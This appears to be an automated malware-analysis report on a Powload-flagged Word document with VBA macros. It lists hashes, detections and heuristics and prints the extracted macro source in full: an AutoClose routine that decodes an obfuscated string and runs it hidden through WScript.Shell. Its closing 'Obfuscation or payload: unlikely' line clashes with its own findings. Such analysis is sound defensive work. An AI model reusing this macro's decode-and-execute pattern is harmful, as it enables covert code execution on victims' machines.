Powload — Office (OOXML) malware analysis

Static analysis result for SHA-256 c273a69f39e66cf6…

MALICIOUS

Office (OOXML)

53.2 KB Created: 2017-11-29 23:43:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2019-01-20
MD5: 231d4f2c7eb9b8af7915e3ca4d4c1d2b SHA-1: 55e714a36a7922274733ffaf8ddbb9ff77787c22 SHA-256: c273a69f39e66cf687f1d9089e7c21191f265c34c0dded99cefea57df8509c24
290 Risk Score

Malware Insights

Powload · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The sample is an OOXML document containing VBA macros. The AutoClose macro is present and utilizes WScript.Shell to execute a command. The ClamAV detection 'Doc.Downloader.Powload-6707242-0' strongly suggests the Powload family, which is known for downloading and executing second-stage payloads. The VBA script appears to obfuscate a command that is then executed via Application.Run, likely to download and run a malicious payload.

Heuristics 7

  • ClamAV: Doc.Downloader.Powload-6707242-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Powload-6707242-0
  • VBA project inside OOXML medium 4 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
         If lampshell - dubby > 1 Then
           CreateObject("WScript.Shell").Run herbicolous, 0
           tetrodotoxin = False
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
         If lampshell - dubby > 1 Then
           CreateObject("WScript.Shell").Run herbicolous, 0
           tetrodotoxin = False
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Auto_Close macro low OLE_VBA_AUTOCLOSE
    Auto_Close macro
    Matched line in script
    Sub AutoClose()
      guardianships = Array("R", "r", "e", "", "D", "n", "0", "U", "0", "4", "e", "", "", "b", "p", "A", "A", "Q", "Z", "m", "R", "D", "r", "X", "0", "", "Z", "s", "W", "X", "D", "r", "", "m", "i", "e", "N", "X", "0", "n", "i", "Z", "R", "A", "G", "f", "c", "A", "", "0", "m", "U", "n", "b", "e", "b", "S", "O", "", "R", "D", "g", "", "m", "O", "R", "q")
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 2113 bytes
SHA-256: 2d391a0c45f31b8270c7027aca5f1583869f986a725dc2bbe0c945d7729f4ee1
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Function firestorms(guardianships)
  phacidiaceae = Array("R", "4", "", "A", "Z", "c", "p", "g", "n", "i", "D", "U", "q", "G", "S", "O", "X", "b", "r", "W", "s", "Q", "N", "f", "m", "e", "0")
  alphorn = Array("m", " ", "t", "/", "o", "O", ":", "=", ".", "c", "a", "x", "g", "I", "?", "u", "n", "p", "s", "v", "y", "f", "i", "S", "r", "h", "e")
  
  meningoencephalitis = vbNullString
  
  For Each activable In guardianships
    overcreed = wily(activable, phacidiaceae, UBound(phacidiaceae))
    If overcreed > -1 Then
    meningoencephalitis = alphorn(overcreed) & meningoencephalitis
    End If
  Next
  
  firestorms = StrReverse(meningoencephalitis)
  
End Function

Public Function wily(yardkeep, duchy, anemically)
  offsaddle = 3
  areas = 1992
  For offsaddle = 0 To anemically
    If duchy(offsaddle) = yardkeep Then
     areas = offsaddle
    End If
  Next

  If areas = 1992 Then
    areas = -1
  End If
  
  wily = areas
End Function

Sub AutoClose()
  guardianships = Array("R", "r", "e", "", "D", "n", "0", "U", "0", "4", "e", "", "", "b", "p", "A", "A", "Q", "Z", "m", "R", "D", "r", "X", "0", "", "Z", "s", "W", "X", "D", "r", "", "m", "i", "e", "N", "X", "0", "n", "i", "Z", "R", "A", "G", "f", "c", "A", "", "0", "m", "U", "n", "b", "e", "b", "S", "O", "", "R", "D", "g", "", "m", "O", "R", "q")
  anthropomorphological = firestorms(guardianships)
  
  Application.Run "classification", anthropomorphological
  
End Sub


Private Sub classification(herbicolous)
   
   dubby = DateDiff("s", #1/1/1970#, Now())
   tetrodotoxin = True
   
   While tetrodotoxin
     lampshell = dubby + 60
     If lampshell - dubby > 1 Then
       CreateObject("WScript.Shell").Run herbicolous, 0
       tetrodotoxin = False
      End If
     
   Wend

End Sub
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 11776 bytes
SHA-256: 2628e71d3f81e363f481851dc2efe9cb60c4e1b606a0f6b48b3cddefc77d0f0c
Detection
ClamAV: Doc.Downloader.Powload-6707242-0
Obfuscation or payload: unlikely